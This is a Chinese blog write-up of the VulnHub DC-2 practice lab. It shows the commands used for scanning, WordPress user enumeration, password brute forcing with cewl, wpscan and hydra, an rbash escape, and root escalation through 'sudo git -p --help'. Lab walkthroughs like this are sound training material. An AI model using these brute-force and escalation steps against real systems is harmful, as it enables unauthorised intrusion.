zoukankan      html  css  js  c++  java
  • vulnhub靶场DC-2

    0x01  信息收集

    开始步骤和DC-1相同,查看kali的ip,nmap扫描同段

     

    发现目标机,扫描开放的端口

     加-A扫可以发现7744端口上是ssh,修改了默认的端口,而80端口需要修改hosts

    vim /etc/hosts //需要本地dns解析,在该文件最后添加192.168.5.73  dc-2

    是个Wordpress站,并且给出了flag1,提示使用cewl

     cewl(这个工具会自动爬取网站,并根据网站关键字生成字典)

    使用方法 :cewl dc-2 >1.txt

    //cewl 网址 -w dict.txt或dict.dic 也可以写作 > dict.txt 爬行给定的url,指定爬行深度,并且输出单词列表,这个列表可以用作破解密码的字典

    扫描目录(这次使用msf模块)

    search scanner/http/dir

     使用模块1,完成相关设置

    set rhosts 192.168.5.73

    set threads 50

    访问发现没有很大帮助,对于Wordpress的网站,可以用wpscan扫描

    0x02  尝试攻击

    wpscan扫描

     wpscan -update //如果版本太旧先更新

     wpscan --url dc-2 -e

     wpscan --url dc-2 -e u //获取用户账号

     发现了3个用户,使用刚才爬下的字典爆破,同时把这三个也写入user.txt文件,方便后续操作

    wpscan --url dc-2 -e

     

    进入后台登录jerry,发现flag2

    之前的7744端口ssh服务,考虑使用爬取的字典尝试爆破

    hydra -L user.txt -P 1.txt ssh://192.168.5.73 -s 7744 //这里的-L是之前的用户账号字典,如果用-l参数只能爆单个

    登录ssh

    ssh tom@192.168.5.73 -p 7744

     登录成功,发现flag3.txt,使用cat命令不能查看,报错提示有-rbash限制,需要绕过

    导入$PATH

    BASH_CMDS[a]=/bin/bash;a

    export PATH=/usr/sbin:/usr/bin:/sbin:/bin

     提示与jerry有关,查看/etc/passwd文件

     同样为/bin/bash,可以登录

     home目录下发现flag4.txt ,为得到root权限 ,使用git提权

     sudo git --help //git参数强制进入交互模式

    sudo git -p --help //强制进入交互模式后再调用bash进入root权限

    !/bin/bash

     

  • 相关阅读:
    drupal中安装CKEditor文本编辑器,并配置图片上传功能 之 方法二
    drupal 开发笔记
    CSS选择器:子选择符号
    转:Redis和Memcache的区别分析
    转:php 获取memcache所有key
    Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in
    drupal7 boost模块为登录用户提供缓存
    转:drupal使用superfish建立下拉菜单
    RAID详解[RAID0/RAID1/RAID10/RAID5]
    DataV纪录
  • 原文地址:https://www.cnblogs.com/-saber/p/14556687.html
Copyright © 2011-2022 走看看